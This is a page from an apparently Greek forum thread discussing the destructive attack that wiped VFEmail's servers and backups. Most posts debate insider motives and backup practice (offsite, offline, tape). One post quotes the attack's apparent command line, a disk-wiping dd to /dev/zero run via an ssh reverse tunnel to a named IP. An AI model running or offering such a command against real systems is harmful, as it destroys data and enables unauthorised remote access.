Σελ. 1 από 3 123 ΤελευταίαΤελευταία
Εμφάνιση 1-15 από 39
  1. #1
    Εγγραφή
    22-09-2003
    Μηνύματα
    81.686
    Downloads
    218
    Uploads
    48
    Άρθρα
    6
    Τύπος
    VDSL2
    Ταχύτητα
    204800/20480
    ISP
    Wind
    Router
    Technicolor DGA4130
    SNR / Attn
    6(dB) / 2.8(dB)
    Path Level
    Interleaved
    Security
    Ο πάροχος υπηρεσιών email VFEmail βγήκε ουσιαστικά εκτός λειτουργίας, μετά την καταστροφική επίθεση που δέχτηκε στην υποδομή του από άγνωστο επιτιθέμενο, που διέγραψε πλήρως όλα τα δεδομένα και τα backups των χρηστών του στις ΗΠΑ, μέσα σε λίγες ώρες.

    Η ζημιά περιλαμβάνει τους mail hosts, virtual machine hosts, και ένα SQL server cluster, ενώ έγινε αντιληπτή όταν ήδη γινόταν format στον backup server. Ο επιτιθέμενος φαίνεται να γνώριζε πολλαπλά passwords και χρησιμοποίησε τουλάχιστον 3 τρόπους επίθεσης.

    Το VFEmail ιδρύθηκε το 2001 σαν απάντηση στον ιό ILOVEYOU που μόλυνε δεκάδες εκατομμύρια υπολογιστές με Windows και είχε σαν στόχο να προσφέρει καλύτερη υπηρεσία και ασφάλεια, ελέγχοντας τα μηνύματα για malware στον server, πριν παραδοθούν στον χρήστη.

    Πηγή : Arstechnica

  2. #2
    Εγγραφή
    08-01-2004
    Περιοχή
    Espoo, FI
    Ηλικία
    51
    Μηνύματα
    20.918
    Downloads
    41
    Uploads
    0
    Άρθρα
    4
    Τύπος
    FTTH
    Ταχύτητα
    1000/400
    ISP
    Elisa
    Router
    pfsense
    Το διάβαζα το πρωί. Πολύ τρομακτικό γεγονός...
    Ανυπόγραφος

  3. #3
    Εγγραφή
    06-07-2005
    Περιοχή
    Νέα Υόρκη
    Ηλικία
    48
    Μηνύματα
    11.616
    Downloads
    6
    Uploads
    2
    Τύπος
    Cable
    Ταχύτητα
    300 Mbps down/10 Mbps up
    ISP
    Spectrum
    Κάποιος είχε απωθημένα και ήξερε πολλά...

  4. #4
    Το avatar του μέλους eyw
    eyw Guest
    Απίστευτα πράματα https://www.vfemail.net/
    Ανταγωνιστής, γυναικοδουλειά, πρώην admin, inside job, περίεργη υπόθεση.
    Ο vfemail ήταν ασφαλισμένος για τέτοιο κίνδυνο?
    Ειχε και 4 τύπους paid accounts, θα τους αποζημιώσει τους χρήστες για τη ζημιά? (αυτός ή η insurance)

    Who's next?

  5. #5
    Εγγραφή
    24-04-2002
    Περιοχή
    Νέα Χαλκηδόνα (Αττική)
    Ηλικία
    41
    Μηνύματα
    7.854
    Downloads
    2
    Uploads
    0
    Τύπος
    FTTH
    Ταχύτητα
    300/30
    ISP
    COSMOTE
    Router
    Speedport plus 2
    Καλά σε άλλο χώρο backups δεν είχαν σοβαρά μιλάμε τώρα, τον λεγόμενο κανόνα των 3 για τα back ups δεν τον είχαν ακουστά;

    Pc Specs: Ryzen 5800X3D, 32Gb Trident Z @3600Ghz Ram, RTX 4090

  6. #6
    Εγγραφή
    21-09-2004
    Ηλικία
    41
    Μηνύματα
    979
    Downloads
    1
    Uploads
    0
    Ταχύτητα
    6144/1024
    ISP
    Cyta Hellas
    DSLAM
    ΟΤΕ - Ν. ΙΩΝΙΑ
    Router
    Technicolor TG788vn
    SNR / Attn
    8(dB) / 48(dB)
    Παράθεση Αρχικό μήνυμα από ermis333 Εμφάνιση μηνυμάτων
    Καλά σε άλλο χώρο backups δεν είχαν σοβαρά μιλάμε τώρα, τον λεγόμενο κανόνα των 3 για τα back ups δεν τον είχαν ακουστά;
    Τι σημασία έχει "ο χώρος" ρε φίλε όταν ο επιτιθέμενος γνωρίζει σε ποιόν server έχεις τα backup αλλά και τα password για να μπει;
    Και στην άλλη άκρη της γης να τα έχεις, αυτό δεν σε σώζει από τέτοιου είδους επίθεση.

  7. #7
    Εγγραφή
    27-09-2006
    Μηνύματα
    653
    Downloads
    8
    Uploads
    0
    ISP
    Vivodi
    Ωραιος mail provider και αυτος. Google ολε.

  8. #8
    Εγγραφή
    24-06-2006
    Περιοχή
    Αργυρούπολη
    Ηλικία
    56
    Μηνύματα
    284
    Downloads
    0
    Uploads
    0
    Ταχύτητα
    2048/256
    ISP
    OTEnet
    DSLAM
    ΟΤΕ - ΗΛΙΟΥΠΟΛΗΣ
    Παράθεση Αρχικό μήνυμα από Symos Εμφάνιση μηνυμάτων
    Τι σημασία έχει "ο χώρος" ρε φίλε όταν ο επιτιθέμενος γνωρίζει σε ποιόν server έχεις τα backup αλλά και τα password για να μπει;
    Και στην άλλη άκρη της γης να τα έχεις, αυτό δεν σε σώζει από τέτοιου είδους επίθεση.
    κατά τη γνώμη μου, τα "backup" δεν είναι δυνατόν να είναι μόνο σε server ο οποίος επιπροσθέτως είναι και live.

    με αυτή τη λογική, και φωτιά να έπιανε ο χώρος (ή όποια άλλη -φυσική ή μη - καταστροφή, π.χ. να κατέρεε το κτήριο που στεγάζονταν οι servers ή να καταστρέφονταν για οποιοδήποτε λόγο ν δίσκοι) πάλι θα ήταν out of business.

  9. #9
    Εγγραφή
    05-09-2012
    Μηνύματα
    463
    Downloads
    0
    Uploads
    0
    Τύπος
    FTTH
    Ταχύτητα
    204800/20480
    ISP
    Vodafone
    DSLAM
    HOL - ΚΑΛΑΜΑΚΙ
    Router
    ZTE
    Inside job? Επίδειξη δύναμης από τρίτο? Who knows...
    Ηθικό δίδαγμα για μένα? Να κάνω κάνα archive στο σκληρό τα mailbox
    Greek Statistics black belt. https://www.r-project.org/

  10. #10
    Εγγραφή
    02-04-2005
    Περιοχή
    Κλωζάνη
    Ηλικία
    41
    Μηνύματα
    3.552
    Downloads
    8
    Uploads
    0
    ISP
    Μπάμπης νετ
    DSLAM
    ΟΤΕ - ΠΕΥΚΟΧΩΡΙ
    Παράθεση Αρχικό μήνυμα από GreekStatistic Εμφάνιση μηνυμάτων
    Ηθικό δίδαγμα για μένα? Να κάνω κάνα archive στο σκληρό τα mailbox
    Το αυτό...
    Υδραυλικός, φωτογράφος, εραστής και ποιητής...
    http://www.flickr.com/photos/120411235@N06/

  11. #11
    Εγγραφή
    12-06-2011
    Μηνύματα
    7.578
    Downloads
    4
    Uploads
    0
    Τύπος
    FTTH
    Ταχύτητα
    500/50 + 250/80
    ISP
    Ote/Vodafone
    Router
    Pf plus/nokia - mu5001 5G
    Ηταν δωρο αγαπης της απατημενης sysadmin ελεω βαλεντινου. Πρεπει να προστεθουν και τα backups στα πραγματα που πρεπει να προσεχει κανεις που βαζει, μαζι με την υπογραφη και το πετουμενο.
    Η δουλεια εγινε μεσω βουλγαριας και αντε βρες τον.

    dd if=/dev/zero of=/dev/da0 bs=4194304 seek=1024 count=399559 via: ssh -v -oStrictHostKeyChecking=no -oLogLevel=error -oUserKnownHostsFile=/dev/null aktv@94.155.49.9 -R 127.0.0.1:30081:127.0.0.1:22 -N

  12. #12
    Εγγραφή
    14-11-2003
    Περιοχή
    At Milliways, the Restaurant at the End of the Universe
    Ηλικία
    44
    Μηνύματα
    3.048
    Downloads
    96
    Uploads
    0
    Τύπος
    VDSL2
    Ταχύτητα
    50000/5000
    ISP
    ΟΤΕ Conn-x
    Router
    OpenWRT (WNDR3700v2)
    για αυτό παιδιά αν χρειαστεί να απολύσουμε ΙΤ / sysadmin και γενικά core employees, το κάνουμε με πολλλλυυυυυυυ κάλους όρους και καλές σχέσεις. πχ σε μεγάλες εταιρίες όταν θέλουν να ξεφορτωθούν πχ ένα top διευθυντή, τον βάζουν σε ένα γραφείο "ψυγείο" δίχως αντικείμενο και τον αφήνουν εκεί να έχει όσο χρόνο θέλει μέχρι να φύγει μόνος του (στην ουσία να βρει άλλη θέση). Ειδικά αν υπάρχει και non compete agreement, που δεν σε αφήνει να βρεις εύκολα δουλειά.
    See first, think later, then test. But always see first. Otherwise you will only see what you were expecting. Most scientists forget that. - Douglas Adams
    There's no right, there's no wrong, there's only popular opinion. - Jeffrey Goines (12 Monkeys)


  13. #13
    Εγγραφή
    21-09-2004
    Ηλικία
    41
    Μηνύματα
    979
    Downloads
    1
    Uploads
    0
    Ταχύτητα
    6144/1024
    ISP
    Cyta Hellas
    DSLAM
    ΟΤΕ - Ν. ΙΩΝΙΑ
    Router
    Technicolor TG788vn
    SNR / Attn
    8(dB) / 48(dB)
    Παράθεση Αρχικό μήνυμα από exop001 Εμφάνιση μηνυμάτων
    κατά τη γνώμη μου, τα "backup" δεν είναι δυνατόν να είναι μόνο σε server ο οποίος επιπροσθέτως είναι και live.

    με αυτή τη λογική, και φωτιά να έπιανε ο χώρος (ή όποια άλλη -φυσική ή μη - καταστροφή, π.χ. να κατέρεε το κτήριο που στεγάζονταν οι servers ή να καταστρέφονταν για οποιοδήποτε λόγο ν δίσκοι) πάλι θα ήταν out of business.
    Μα το ότι είναι server δεν σημαίνει ότι θα είναι και στον ίδιο χώρο, τα δύο μεταξύ τους είναι άσχετα.

    Προφανώς ένα τουλάχιστον backup πρέπει να είναι σε άλλο χώρο. Αν π.χ. ο server σου είναι στο datacenter X, το backup ιδανικά πρέπει να είναι στο datacenter Y, ακόμα πιο ιδανικά σε άλλη πόλη.
    Σε αυτή την περίπτωση, ακόμα κι αν πέσει ατομική βόμβα κοντά στο Χ, το Υ δεν θα επηρεαστεί (λέμε τώρα).

    Αν όμως κάποιος γνωρίζει πώς να έχει πρόσβαση και στους δύο server (ή σε τρεις, ή σε τέσσερις κ.ο.κ.), αυτό δεν έχει να κάνει με disaster recovery, εκεί μπορεί να μπει και να σβήσει ό,τι θέλει.

    Το μόνο που ενδεχομένως θα σε γλίτωνε θα ήταν το offline backup, αλλά αυτό είναι εξαιρετικά μη πρακτικό. Γιατί όταν λέω offline δεν λέω απλώς να σηκώνεις ένα server (π.χ. στο ΕC2) να παίρνεις το backup και μετά να τον κλείνεις. Κι αυτόν θα μπορούσε ένας ex-admin να τον σβήσει. Εννοώ να παίρνεις backup σε κάποιο φυσικό μέσο (δίσκο, ταινία, στικάκι κλπ.) που θα βρίσκεται σε δικό σου χώρο και μετά να τον αποσυνδέεις. Αλλά ανάλογα με τον όγκο των δεδομένων (και αν μιλάμε για mail provider σίγουρα μιλάμε για πολύ μεγάλο όγκο δεδομένων) αυτό μπορεί να είναι από πολύ δύσκολο έως ακατόρθωτο.

  14. #14
    Εγγραφή
    13-11-2011
    Περιοχή
    Χολαργός
    Ηλικία
    37
    Μηνύματα
    1.439
    Downloads
    1
    Uploads
    0
    Τύπος
    VDSL2
    Ταχύτητα
    24000 / 4500
    ISP
    Wind
    DSLAM
    Wind - ΧΟΛΑΡΓΟΣ
    Path Level
    Interleaved
    Παράθεση Αρχικό μήνυμα από Symos Εμφάνιση μηνυμάτων
    Μα το ότι είναι server δεν σημαίνει ότι θα είναι και στον ίδιο χώρο, τα δύο μεταξύ τους είναι άσχετα.

    Προφανώς ένα τουλάχιστον backup πρέπει να είναι σε άλλο χώρο. Αν π.χ. ο server σου είναι στο datacenter X, το backup ιδανικά πρέπει να είναι στο datacenter Y, ακόμα πιο ιδανικά σε άλλη πόλη.
    Σε αυτή την περίπτωση, ακόμα κι αν πέσει ατομική βόμβα κοντά στο Χ, το Υ δεν θα επηρεαστεί (λέμε τώρα).

    Αν όμως κάποιος γνωρίζει πώς να έχει πρόσβαση και στους δύο server (ή σε τρεις, ή σε τέσσερις κ.ο.κ.), αυτό δεν έχει να κάνει με disaster recovery, εκεί μπορεί να μπει και να σβήσει ό,τι θέλει.

    Το μόνο που ενδεχομένως θα σε γλίτωνε θα ήταν το offline backup, αλλά αυτό είναι εξαιρετικά μη πρακτικό. Γιατί όταν λέω offline δεν λέω απλώς να σηκώνεις ένα server (π.χ. στο ΕC2) να παίρνεις το backup και μετά να τον κλείνεις. Κι αυτόν θα μπορούσε ένας ex-admin να τον σβήσει. Εννοώ να παίρνεις backup σε κάποιο φυσικό μέσο (δίσκο, ταινία, στικάκι κλπ.) που θα βρίσκεται σε δικό σου χώρο και μετά να τον αποσυνδέεις. Αλλά ανάλογα με τον όγκο των δεδομένων (και αν μιλάμε για mail provider σίγουρα μιλάμε για πολύ μεγάλο όγκο δεδομένων) αυτό μπορεί να είναι από πολύ δύσκολο έως ακατόρθωτο.
    Το offline backup θα έπρεπε να είναι υποχρεωτικό σε τέτοιες περιπτώσεις, ειδικά επειδή έχει τόσα δεδομένα χρηστών. Για τόσο κρίσιμη υπηρεσία θα έπρεπε να έχουν ημερήσια tape backups τα οποία να εναλλάσουν σε διαφορετικά tape. Δεν είναι τόσο δύσκολο να προγραμματίσεις tape backups και απλά να πρέπει να πάει ένας άνθρωπος να αλλάξει κασέτα μία φορά την ημέρα...

  15. #15
    Το avatar του μέλους konenas
    Το μέλος konenas δεν είναι συνδεδεμένο Πρόβατα μην αυτοκτονείτε. Όλα στη σειρά. Ερχόμαστε
    Εγγραφή
    14-08-2007
    Περιοχή
    PIIGS
    Μηνύματα
    4.512
    Downloads
    4
    Uploads
    0
    Τύπος
    FTTH
    Ταχύτητα
    300 bps ή 300Mbps
    ISP
    Το άλλο Πάσχα
    Router
    OpenWrt
    Path Level
    Interleaved
    Παράθεση Αρχικό μήνυμα από MitsakosGR Εμφάνιση μηνυμάτων
    Το offline backup θα έπρεπε να είναι υποχρεωτικό σε τέτοιες περιπτώσεις, ειδικά επειδή έχει τόσα δεδομένα χρηστών. Για τόσο κρίσιμη υπηρεσία θα έπρεπε να έχουν ημερήσια tape backups τα οποία να εναλλάσουν σε διαφορετικά tape. Δεν είναι τόσο δύσκολο να προγραμματίσεις tape backups και απλά να πρέπει να πάει ένας άνθρωπος να αλλάξει κασέτα μία φορά την ημέρα...
    Τα tape backups είναι αργά και ανασφαλή.
    Την έχω πατήσει από δαύτα (η δεύτερη στο ένα και η τρίτη κασέτα στο άλλο δεν είχαν γραφτεί σωστά).
    Όσοι το χάλκεον χέρι βαρύ του φόβου αισθάνονται,ζυγόν δουλείας ας έχωσι, θέλει αρετήν και τόλμην η ελευθερία. Ανδρέας Κάλβος
    There is some shit, I will not eat. e.e.cummings
    30 Hours per Week

Σελ. 1 από 3 123 ΤελευταίαΤελευταία

Tags για αυτό το Θέμα

Bookmarks

Bookmarks

Δικαιώματα - Επιλογές

  • Δεν μπορείτε να δημοσιεύσετε νέα θέματα
  • Δεν μπορείτε να δημοσιεύσετε νέα μηνύματα
  • Δεν μπορείτε να αναρτήσετε συνημμένα
  • Δεν μπορείτε να επεξεργαστείτε τα μηνύματα σας
  •  
  • Τα BB code είναι σε λειτουργία
  • Τα Smilies είναι σε λειτουργία
  • Το [IMG] είναι σε λειτουργία
  • Το [VIDEO] είναι σε λειτουργία
  • Το HTML είναι εκτός λειτουργίας